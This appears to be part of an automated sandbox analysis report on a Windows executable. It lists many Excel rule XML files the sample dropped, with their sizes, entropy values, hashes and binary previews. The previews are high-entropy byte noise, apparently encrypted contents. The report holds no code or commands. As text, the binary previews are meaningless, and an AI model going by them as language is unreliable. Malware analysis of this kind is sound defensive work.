                                                                                                                                                  Preview:<?xml..R.*................[.Tj...W\.....Y8n\........a7A.G....O...P9.....j...u. h$a......r..Er.QZH..,.q....=1..:.Z...pb..2.j.D0...r..@Md.A.eA....~eiB.by.q7m.H:..*.7[<.e$....@B(Dtg...G%Bn....Sb.P{*....D9.{4,...%.?F.3.>...aL.).....=^.B.Z...Ku]...m..v..X.O.,.qn....G.ns?$..p@...v..+@.;b..!."....@.).:L..+?.........)..u7..o.......#.....q.E='.G.g...r..6.T...`..V.R.(-~NTF....r....=....c...?YEK....w.uH.-.'o....|..|.........gb.....Q.(.....g($.a...>.s..H#(<MD...`FX.o.eF.v........z.n..,n.U..d{E.Y..?.3gH|.{..f.;.g+.........DMn.F..n\.....OJ.h.....I.E..T.De`..R..q+`....B..H" "r.V...j...m..+j2...c..z.._9..w=...Q.7.vZ...W.va..@.MMP..p9=...4..9W.E&j.a).H...F..Rz...v....Y.)..._mjn.....*.'.a.f.D....|....C.].B'l......g..[._..OCd.....Q.:.WC3^........i.t~#0'.v..e..q.[w%..f....R,...#.LL.q..a.......@/...]*7V..9........_..:f:|.../...8.p9...?.a?..........,.o...4R_X.SV.....t.c\.:....+iV4....A....A.........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1380
                                                                                                                                                  Entropy (8bit):7.870421789255486
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:M9gItsnBQ9xzsj7FPVTqKHhjUCMBA/z69JBXhtvTajyf2bD:M9gnC9Zst9eL/BA/z6RhMjy8D
                                                                                                                                                  MD5:7ACB787084F5CC9CEA91DA353D39991B
                                                                                                                                                  SHA1:0736C54C33C091C10EC080EBD68348B05B45324C
                                                                                                                                                  SHA-256:10D3E5C7D36068C9FD63EE22D1144D3D6065171A6A265D99B1492B6493CDDB28
                                                                                                                                                  SHA-512:7195C0C1ED1A067B4E627090ADD3A3ED5275B11E710BDFA1F99A8A0D5F1A005D713D0B168E5B1ACF472C4277F62457D618FCA1C17152101367ABEF1AE1F5FAC1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlb....r./..f...sa#.7\..G/.=..W....y\$.A6>.X< 3[.l.....o.W....}....t/5.v..<.H-.#......VU.....w..=....|........u...F...d..d.T...s.{a...Y:.a..|..=.sS...pp..m...u..m.z..)[....b......cr.....Q.a/...../.S.....t.=.Wf.{...yx.4.0o.,.....n.y1.+.:...,...c..-lX.g.....S._t.........5.Z...=.f.2KV..!b?.o.....%..46.....g..;....<5V..f..T;.....Sz.......H.?...-..W:.a.^.w..?..*i@.(.(..vCH....e.o..e..r..g...A../Z0..}.A..Zd..#Bp&q..Y.m..zv*w)/.{!........a.=.4tCM.....x.....G..D. .4....0.a..36...D.AZ[.0.M....{Y.I...?..veh..r.AXJk..o.n.EW...'..$..l.;?I......DC..i.c.:vT.Y...T ._4..|.b.|I..OI.<.....P_...,..$?.~.|...q,e.b.%.$...!k..9.Y*(.{...#.6S.u.$H....H..n.^..i.....NHw_-.B.J..H.....n...w..d...M..n.^.C,....+.:..#..W.F........8..kV=.....eJd..8......R....(......(M........._..C'..r..fWE..y{.Q\...2...]8.....`_.....9xU..M...y.VM.zR9.e..@..Y..=.q..4...s|c{^......?.)).....> .[7v.3..'_L.k.#..^..*...E....].n.@...D.OC..A*Jk[...`.s?.8!e..s.....H.P"...vZ3q....R.reI.....=9..u.ub5.*.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68010v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1614
                                                                                                                                                  Entropy (8bit):7.878729005580333
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:o1rwuw0yMwEjgdQCErn0xUAqDjhy6imseONYfD:2MujyhldcqUhfhLiSUC
                                                                                                                                                  MD5:E197E62BEBBDF22E561D5C1540F9C486
                                                                                                                                                  SHA1:37DBC2534CFCC02F550F6F0D7BA814F62B58C9F9
                                                                                                                                                  SHA-256:6D279265F73F5140F39668626EA43F2AE62495BCC370C47CDE7DBFE21B345849
                                                                                                                                                  SHA-512:AF113B0A0F67C18C59B41348A01F2035444F5B4D5241E12C5F476F4DAFBE87B37EE2DFE788D76FB7DC2637761B999F506B11370B0A8D10926FCFCFA727A442AD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.g.=#.l..Xc._AIMjPoj. {N&T@.|.Z.....n....4e......>..=.....nL|#..;..R.....T.yd..Q..A.?~..o.....#2...K.J..&.bh...vy|.#..t.y"..}....qbV...;].V............/_u ..9...FQH4D.}.gu..D.E....3J.H....}&.I.*0g.L.2.4....4.!"*v...../.......Y.:.tv..0p...`..pD@+.Y.MF......o...q$c2>...F.2Ns.m...3Cj+.I......!;/.$P..*....b.........Y3T....`tF....Q9..g`.....R{..(.i6.j%.5Ba7^E;V..1;.^......U......M<.d4......gf....`i..+........v..............wX..X.#k.k ...o....}r.P.b...... ..AH...a]..-..... ..V=.......y.y.v.......6Qs..R+......X.K..w=[.:.5n2.........G.....8.._.....>..(.......Z...^)[..3C..C......*...v.ZL...i..^bn..B...-...(.p.:8.iu...<)>...8..}*..3.,*g..>q!..G.../..Z+.;...f.........wT.4l..^`.U.Dc..S._..q......AI.-).U.....S...R......^.V.o....:.....K...b]..*..d.....(.Z...Ay.W.2....tt...|....J..V.m..BB..D...@\.M^.@Vz<[l.~.BQ[3..../#N5.+.-....t.x...[a<.MN.z.M+5..g%.(. Q..-.Q...h.0h....$...q.....v.x.&i....-..&~...S(.^B.......'.]......).=..$>.N\Lj6K...e

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68011v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2753
                                                                                                                                                  Entropy (8bit):7.932201401106086
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:rI46A0zZan01lIu/qyNoJY2jtmwTFU4FJ1dBDovixCkxHi27+lkoIEEWBeOXhMnW:rw3zZc01Kuiyl2MwTPJ1DDoqxrxHikyd
                                                                                                                                                  MD5:BD90F96925E02DB8E96A06E842FECE8C
                                                                                                                                                  SHA1:C923A6B4D975226F6E1E00ACF588F1714538C440
                                                                                                                                                  SHA-256:9175AD5EC79F5D8928A30A846813A27A4D0007D446E0566BFED948849E88707B
                                                                                                                                                  SHA-512:3304265EF67C28FC2AD65A0F87A6C9E9412E51A0CB8AA22B3EF0CE22AD5214C3105CBE4D2F163DFEA9F9D2BB989C7ADD8E3BF9B0A64298AC1AEE8402653A7B8A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.D&u.,.e..{.d.]..R{:.9......C.l.!1.:...a...q.^..b!..q.5hN.(.z...o...<mL3L.E....D..m'...E+o........W.^1..R..40....q.'......`.......<A?d.:..>.....Y.sc..3..kIz...2.8.b.9..W....h..7.OH.?..........P.d%.....BRc.1.E.).Ya..i;~..../[.F!T.1....q:....S"q.S.j..4...1...B.=.u..BF:..u.....t..8..3........c..q...zA,.,Z.O....[...b.L....A..{A....|..3x..M.T..l..E...>...........`.m.c..v..../R...&..'.B.....IV....T...P>..U..\.r...X.4.Q.&..w..8.....=,.............]....8.1..(.....d...7...:,....<..g..q.."..{.3..8.<..[%.M.g6.....x.Afr....i.I...1n.L...(..._T.P.@.B(...Q.?..DE.P...#..+.....h!.l...M.%G1db...&xh$...o}Q.M..hV..k}5.k..8...=.u.O.V..1........~.r_8#..Y..x....:.vk.6......=(e..1e.Xr8./m.|..e.\....6\.DN.N4....'.....pX....M*....S..>._Fe.8...8:.,C.E..7..@E.,....'.m.....j.&.%.-e8..+.G.jkt.7q.Q.s..liD..<.j#..Yy;........h...M..W...eYG.G.^.....Ji56=n..h.S.HL.3.G...$3..M..$7.P..I.m...x..v........).;|4.`*.a......`.....f.v'D?..g|....l*...P.._....d.K.ylZ...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68012v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1558
                                                                                                                                                  Entropy (8bit):7.875910236686575
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:n5+tS1MlReIZRUAHjJRr7MgtK5/nxKpuD:4wIRhdr7WAW
                                                                                                                                                  MD5:959B03E6507E77AE04927FDBBF107965
                                                                                                                                                  SHA1:CC00FC653D4F6AD6F55BA88F6783DA30D966A3B6
                                                                                                                                                  SHA-256:D7EB98F32AC10FEA9A85E00021D1AD17FF0884FA2955106131D6F2D6CD276C6B
                                                                                                                                                  SHA-512:617641DCBA9DCF6B563867F20EA4BA8575179DE82921B6453EA3E8B0BE1325AABD9CBBE3161730149C89123FAA1CAE126E0F37BE4A44766D15F171BF2646EACF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...M.....7.7..[...x..."o.&..G..._........eU.a3.z.f..A.,...*..@..4.u.....wK...J_....x.t}..X@..9.r,.A......C$.g"..p$..~.94).P._.+....->L.wB]..cd.S.=|=` .#c...3....L<i.J.@.X{9................S.j....P..._o`...|.C.I.jMZ< ;...#..>... ..TLz..9...\...F. .,..0.....?uPb...)...|...;d.za ..+....."L.Cs.4...H,W......;..\m.}*U^A...Z..A.F%.c..?..;~.:M+Cd...A.y':.T....`?..).Y.Dv...!..".N.lp .b.n../.>..+..{....)J.mQ.3........5..L..b#..`.n..CU.Q.m$.$...&.e.WlZ.b.h.....I.......2...;..Xn...l..f..pW....f..w.+5.........,&.~..Q.......3b....].o\J...,....Hi..y..v..*N............lSa*)...;c.!P.Y3.....X.hJ."l..(2...+..-..\...}a.c...l1..n.... ez.).XF..m]...c.o..P.~.Q..t...;..B+.?.........d.yK..........4..Z..\.u....(A]...;pj.B.....F67..X..W_Q..#vl...K...R*q..e..Q.....sD~=v.b.......i......{...............A;.> +w3O......W..._..d..^%.......zL.n.=IC....SNE.+.8L....*`N....W.;.K.;..Q"..:.........R..)".i....$-........@.I...4...xQ...7..g(...>.)W>....PH..vp.y..U..d".._.E<.Nw

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68013v9.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2251
                                                                                                                                                  Entropy (8bit):7.9158122900934105
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:DTHSLOIxOXUkGSwBkUG4f7VnnCei+fdcSSAWh4jDisdFqtO7cVGYD:nHrkkGSP4fhCglc5lOicqrVGE
                                                                                                                                                  MD5:A8897BB54F9596F458BF4267184CA3DC
                                                                                                                                                  SHA1:27AB1252639890DA5FE10AB4C392F4BC93472500
                                                                                                                                                  SHA-256:F05F38F0728624345084821DFAC9D5F2891180FC2F3792F633E385C37D291CCF
                                                                                                                                                  SHA-512:1E9562AB7C197453ACC119518099590FF076E60A1556211B7DB201535076FC87661EBA377C7DFD3287F4621F62D3A462366DEAC44198BFF6D116CE8642F34CAF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....k...u.......G.&...%.Dt...7S...C...4,=*....k..^.?D........E*n.c.G.E{t6..1.PZx.j.Eq..{.L...z....H.R.WF.Uod...Y....v..&..nh....\...p/.o.%*...x&.{..*.4...il....!t.O..}..=.?I(,..s...ib)lR.9.q...k._.O.....!.G9W.q.g|.-.((i........_.......T.+!.o...?2...s..y...R%..Z..#.<{%...o.3M.t..eA......p9..4%.C.{..Y.To.q..lEB#)...z.TQ).O-...3.U.B.0Z.=..=<.5r.sg..~..76.."..!..S~5W<i.....).F*J..h@U..A.....*...V@2..$G.p......Q....$..O.6c3K}.,!...:s..K.'6.....p*.8.5'.c..1t.&Z...9.8..)..1.......@. .u..O.Y..8a'%?_C..q..*..c.!rc..-{..p...R..yE.C..*.UkL..Xg..ke.....g..O`.,.9..3..bn~..s..o.Z....A....$:.....Sc.mc...D..4?.@m.V.z..D.v7....d..y....k.h.W.F...s...:................\.<.Y&'Br.....8.3..2>p....N.Qc.....7t.T....N=.Cf....4.'b..7....a.......s=....FB.e...INU..ui..vb.........|.Y.#.o.+..Pr.'..Ej...l..c...l..):T.9....@......{.vY,.cb.t|{}b.%.y.}..0..2...JviS.0....eh...[L@@..A...WN...L..|.e.md.[T.7X...1.l.2N..p...H2.......D.U..f....pf5..9...-,...^.~...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68014v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1826
                                                                                                                                                  Entropy (8bit):7.891685402442889
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Dt5wq4jLUsXcPUKuuHrQgdGbtGw02mosD68oID:Dt5u7c8K3HrjdGbtGwqo0IU
                                                                                                                                                  MD5:92118E70E1EB9DD3C8AF4278C9A72581
                                                                                                                                                  SHA1:483718AD213CA0E923B0D097C71BC51E552E3656
                                                                                                                                                  SHA-256:38EA01ADA7C2A6D763FB8C43C78782E77F37769C3B2E49EC7FCE72B0E19BEAD9
                                                                                                                                                  SHA-512:311FA0B9DE7FDDD12276528741F64BD28C50EBC8690ABFF4C264B82D6CFA374009A32311A5441824728D9216D567113AFE541142D58500F99529244BA109A242
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlrc.<....%T(@:1-*..k[,P.rh.dv"V.7D.)........7S..n}>..p....d2/...{.R.....o.'...4T..5?L.P.C/.+....v?.g....k.h<....K..c5=..[.e.n..*.P..9(A1.....DD.;q.....J.|.(...V..{zt.L.b.uF.9...(;]...).!.[K..6.....IJ.>1L.....i.yV/....db.6`.}>...{...|&...../...Pn2.g.l..)......<ag.ti ..%?......6..O+9..;...........wQP.Z. \.?/.%F...I.o.(.R.......\..;4.a.{.{G.&yD...R..d....i..g.....y..m.j.....=.C.IP..x..0.]un...{..8.iP..-.I.6..c.....\.m...;...j>l......l....o....iA...Em....W]S....0.....c.-...`~..K...o.*.f...;....1Q/.7=....49p...J.x.z/.[.........w...Ou.\.....n.A.....t...p....Z@.0.....Y.SrO.w ..........B.jd...o.d.a..~...<..7A...'}........G".SI...$.FsL}.;.....Gu...\.?...2...B.Y.........p.aJ.",on...4....... .ZO...7p../cL@.X`?.|o.?8......"M{S?h^..}O.o=....s=.....`..4....Tk. .1.C.|..C..b. ....A..#...l...=x.6 ..q .A7ajc<'.,_'.U.4..:64M`'fUhJ..!.. t.........5...Y.....3.-..[s.=.,5......0.`.FU.A....u..g......+5.Q.b..p`@<J..H|.....%.cm......'.<..vc.I.Z..<u.s;9.'...q

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68015v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1197
                                                                                                                                                  Entropy (8bit):7.829427644299514
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wGzY3ipmNYNaXUrjUt09TcZ9HDGZSAcAIwMo3ONFeEgIumS2bD:wGzFpmN+aEr3NciZSwMJumpD
                                                                                                                                                  MD5:9D779941308D225B4B12D7C5DD4F8530
                                                                                                                                                  SHA1:CFD1EDA9C2E7AF395E3E899B872094CE415D7E31
                                                                                                                                                  SHA-256:9A1432D5D94CCC381019412A37647E813AAEFD43AACC4226EA292894E290745F
                                                                                                                                                  SHA-512:7A5B7790E6A3A730CFF42214C0CD5790710A9F836E4E47E718E48ED1D8E448F8467FF0C605372149A310E353B27241E35F33D7C97C9F7B49656009A360B3F559
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.d.g2}...m.{L!...j^........HB....o.u.A.8.[t.:.h..A.....p.......<ZC.[I...c.....B.E.U.'126.`...A.g.._...x.N...(..GS3@4..$S .N....S.KO&!..L.`J.6...].8at..;.M....v".;......u..x.1....M....Z..3.sE.v....q`:<.&q.4x#.C.\H.n.@'..,..tY..&.....2.I...4.Dt..S!O..N....W...-.....s..g~..]..,}H.s[}Yg.>.!.1.Vu?rmW.\Ep....Kxm......szdP0fZ.-##.X...`..Z..Xi.../m,1......J1.4 .k..M4.PBU.......s7.4.$-.47...G .d.9..vt'.33.U..w.2.HnJ.W.i..5.`.$..b"....k.W...'.:_....w..$.R...JZr9`..,..."...t2..g:..|.......w.2..".....v.p...I..._l.y.3.p..h.%g...A..%...kM..zG/./u....=M.Qws.XC$.^....#LY.<,.AD ..d<.G%...".;..[g^$...........&.9.:..mU..`_a... .z.d.._Z.....U.(.f(`*\8.;.Y+3.B.\..;I....#Q..xpH......"..k+|..ux.V'z}.rJ....B.YvWx..K.i...'..Z..}..3.,....~D..G.........].O..mn1.9.)U...K.... ...*.9.RA..|...k6.bt..w.QI]..n"..r.wCXZ9.UK..L......N~.....C.?....y.....F.Ti.Y=.M...%.......)x.....t...4.M....@..9....;....q....#Kpy~.D*.a....!.R.&[..,.Y.}.......|].+@9F...M.R...#.3X.-....f.i

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68016v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1004
                                                                                                                                                  Entropy (8bit):7.794623057941139
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XHHOG/BpYs+RjUFOcU7n13KeMEpYau7+o2bD:bv+y/+ndlTmID
                                                                                                                                                  MD5:0D8C7947029379E0217674D635DCCD1B
                                                                                                                                                  SHA1:C15A3CA7A82532B0D6365D9DDE9EF10D6E81CBC0
                                                                                                                                                  SHA-256:E6C1B9D0E17073F5F08512981BFF65CD85E4837EEA76EC7581675D6634333557
                                                                                                                                                  SHA-512:E6B7ED07F6DAD64D85EA04C7A97E718DE11DB75A7C35ADDC4690A61D8E6EEEDF729836349A347D6AB4EC3F6B985FC1F3546487940215DC781AA17A396EA4BC87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.L.Q....&J....n~T.A..".y...HJ.....+3..{4.`.a.........k...>q..0.......m.......?.Z...2S.G...X...q.4....#@mT......|.TSN.0....?..P.^.m......`..D$.O,.U...p...L.8u.8..\.1.,s(...T..#..,..[:....$....Z.<.....+.\6...c._.D..J..eK7.._......r?.t.04.>....w.p_...4.........1...='?E....H..b.:...].$.V....9k$.."7..L.>..M.M..jd0%mRP(...j..~.-v..N.3.7i.4.wK...+......Y.D;6...$......R.A...Y..E..v|..N....[..|j.oj......'^....f..Z....?n!..lK......<GI....Q...qV.a.x3.v)..x.0..{.;......S@AYk.Ab...:bX.....9..).1..t.CU.ud....P..N.&t..i.E.....=....X."}..Nl...s.k.8.9,......Y..-.....h.W.b..k..j.4.4.1.RrUq.Y,..U...*...G4.G|.D.......(..y.......{v.....".}Y...y.rs..5.5?....-.lk.%I.i.......OQk.=....cD0.E.+.hv`.....|..._...L..H.%+.........:.'.C.......z.Aa.0...T...9.5h..>........F.&.@$.....X.........K_p.).(.j....5.<.S.x.M..T.C....tG.;6.4.........U.Y..oI6.I.GVN.&.,^wU...Ud7.IO..,Kp.....U> ......#X...I1&....|)mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68017v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1186
                                                                                                                                                  Entropy (8bit):7.7978798635575455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:e+5GqdrGjgEKPKpCKSNIuPEOuP1nftfgjnXWVg2bD:R5dUgEKPKTSfcOudnJCnXWpD
                                                                                                                                                  MD5:A2A76B459D87754C446F1C5FF789A307
                                                                                                                                                  SHA1:16DA2DED8D0EE233F348805C5FA09545B790BDE3
                                                                                                                                                  SHA-256:2A1A1222D41CBC922C83F44D1BB93732813FEE52AEDAA1C7D0F74E0EC11F64D7
                                                                                                                                                  SHA-512:D1E6A318994F8F1AAAC7306F0B1362C39BA5B15F9E39368138D6534A280744650D5722E2BCC53F868C4C5E9C1CA5730EF2815F39F5D1A5EF7F63C359C118607C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....-.....v$A...b.hli.v..B8..D?%.3K.....<R...11.......~.\.0...T_2.W...v.9x...:.0.&. .U4/...5..0...T..NR.k..Uk:&bx.x?+l!../.G....)U1...#....X.xh.2.t..k.{..N.....Z.V.F.?...mK....-.}]...v..BG.9J....t.^.1_.%/..r.v..%....Q...z.K..'z.MF.N.EF.D..C........[...Z...g..BmR..s.$.a.t..h6,p..@)]a...I.OT@..E.N!.-7J.....@..Sm...P.^[]...,dC......`..M.u,.>2...^...of.........E.5&...06.H>.F-...o7.....A,'......2/..*...!RS.k.mZ.J.A`...L...a+.Q;.>....>............)?....F.'...e.(..[4~../.....-A.Z.....%%.>.?.]..).&....8.<.....0].%..d.D ...6...K....K...6@.)YwK...N..o...T.9....E.+.I...G.2.]np.....B..K...P..L...?...o..).E7.....i...i~NV..O...C<.........7x..S._....l.A..M..).:..'.04.!...~W_;..-.n{ 14.b.%...1.''1....D....Q..nv.... .'......]-r...uVk....x.....T...6lI....C.F'5...m......2.>.5...z?...U.z.s.pK8e...G.Y.LBKd...2.*.C-...Q..R...=.}.......f... .;..3.. .........l,.......?.....H. ..._.F....D..o...|........9.Z...A....m...t....J.=..m..7.NT<.o..bR...A..!.JjH`./.<,W.l.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68018v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1291
                                                                                                                                                  Entropy (8bit):7.858324233148237
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:q7uxuKlNcqFZg03Omz8WyyKdpKIsThHjhrM4aLLYy2bD:q756Zg+OoXKmIsThDhIvoD
                                                                                                                                                  MD5:74D176F2687F92891BD789B08F96F960
                                                                                                                                                  SHA1:75F3900A253B968568939DBE1639D24B2C18EFE2
                                                                                                                                                  SHA-256:CA2680952B2604B3275F4D336E7EF26C3A9658E913D381EFEF94291527E911A4
                                                                                                                                                  SHA-512:6FC36CE3645BC997DF8607DB58679B375179BEDDB74461199B8531CB329CF339A28DA4BC5514A3B45AD7A722D508CEC8269BF3F6D58650900555EFCA429F10F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlP..z.z.....(.._F..8d...k.(..t.T.;.U[am .....W..H...o..n~.@.hlG8..].....$.#G...v$y...8.q.&.4.. ...9..b58K. X9.,.H.])p'....Jm./.d....D.....F..L...>.7r..H............y.) ..BR.K......L.m...y\../.p.s{....x.........Z......i.>ce(.>..rt.......fu.v:.^.s%".&..{.o...g.2.A....|.I....[.0qvw.+A........P.r......"..L9.g..2F....}t.=.L0..".3..F......X.T.T.C.......]7.a.2..cJ.........._.+.[.....QA@y...........:....ej..f.co..`>.0~.Hn...XG.Z.:..e...D....B.~..e.]..3...P....XH.WQ....~.K..[....XB... .....).W...q5...o.".j.kBK.LO.b.~-.......".r.......X.K..........Q......y.4.o....b..\.|..Ro..xO...l..t.. k'...::.d...........!.?...#.q....).a....5.....xK>....F.&....f...d?....+.....Z(........c....*.8Ni..je.1x.}.9..'w......z].;....-...U.FO..E....z]nvW...T.E$.h...C......).8....(...E.}..h........f.0..#w.z.....s.>D.,?..%p.35..c.".^q#.,.?Ym..l.z..P.O....o.....b_'.(H..w/.`_.v..K....+.o..q3..mab.....R1JN]&.L.g...N.1.j. .8.yT.+.....U....'.X+Bb.F.T....u....0...../..v

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68019v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1737
                                                                                                                                                  Entropy (8bit):7.873536481975073
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:I7Kd7jF6yftHNlqaJN2phz7gWlToorbQRS+RBMpKyQK9ZBokpSXYD72fIm27V1Jx:GssKH+rp9XFXQ+oIKk8Yn2fIm2h17D
                                                                                                                                                  MD5:CBB9041CD76A27D3C216E6312BD34883
                                                                                                                                                  SHA1:598A831C933582E137576BDF0C2F621202A6FD8C
                                                                                                                                                  SHA-256:A993196820C286F6C3751D9C6CBB01CBCE35566651E9D034130309EA0B561F17
                                                                                                                                                  SHA-512:25F2E49112756E813D9F9F8BAF6588B70A00C2C703645F4C0145DECEEBC1D7A5D0B45FAC549AE44C039600056DF99756F3B266CD434457D606714BEE765B71C9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlu..,PiD......4......z...=....._A...!2..u....a...".G...I.."W.3h.s...r..R.3[K.....$.-..v/Tn....7k..(.U5m..J.I.0.....S.3.x=._3..(..D..8.*v..vqU.iuaX...o..9.D....%.~.`...ncV.....d..VQr...M. .vu.>.O...i..qu..ju.o....8v.j..M...Y..d..G.E.C.i.z..)z.^J-B.........?.f.79....`..3......u.R.......D..!.o.............yA..*..d'...2...F!.Q.7..j.....^..8w....'[(......+.*Y&q.,..b..zC....$..8...'...@\.h.R4....;......!_J!*...m0...s..I)...i....b..HBT1.D.y......`.ek..<.. &.|.L..{.C,...T....V.B.?.."B....6[.p.^..Se.A.........e.U`..F..n....Pz....;.4.u.$#.......Z.v.F\....e..>Z.....Q..Ct..m....mf%.vS....1.....Wv..|.."....aD.4... ...x..{.`}..CRh7......]B.E2bS.$l.1F]/.s;k{..&...../TS.$6.>.~p.J.<..,.q.w........U...o>...........4^..}.&5eD.\<...Q......iTR.t....M...d.KG..(!Y.a.,....Y..66....Ch@..I...j.Ux&....X.3.V..[J.."..|.~..c....9J......>`".~....?..t6B..6...~t...a.5.p.1+.g.d......Ta..Z~+..;...w.6...]4...xC45.KkF.Q..c...!..Bo:...H...t..eNz/.8..l...I[s..R."R..T.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68020v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1354
                                                                                                                                                  Entropy (8bit):7.822732235241149
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:C/O/R+HBbLn9NwQKssHwBcImE4KHwGXfDgfsfRq8hnqBs962o2bD:FRUBbxNwtsTCzOw0ZZ9bD
                                                                                                                                                  MD5:65EDF1913B99572FE34ED3F8F97A84AD
                                                                                                                                                  SHA1:9C5A934D3611B65F3B7DCD84E6E7772D18CCFDAA
                                                                                                                                                  SHA-256:D3A50C2FB15E08416D74011882A676588FEB0E9BA81B8F4220FE5B29B4BCF2C4
                                                                                                                                                  SHA-512:69552B78DE288DBBFA5BE62B3356DACC577797BC56EB2F5E942A0E3904E5F92F87DCACB936BA05B78A673F58ABD0540A3B9C2B54D03F38B96E69C010870C1828
                                                                                                                                                  Malicious:false
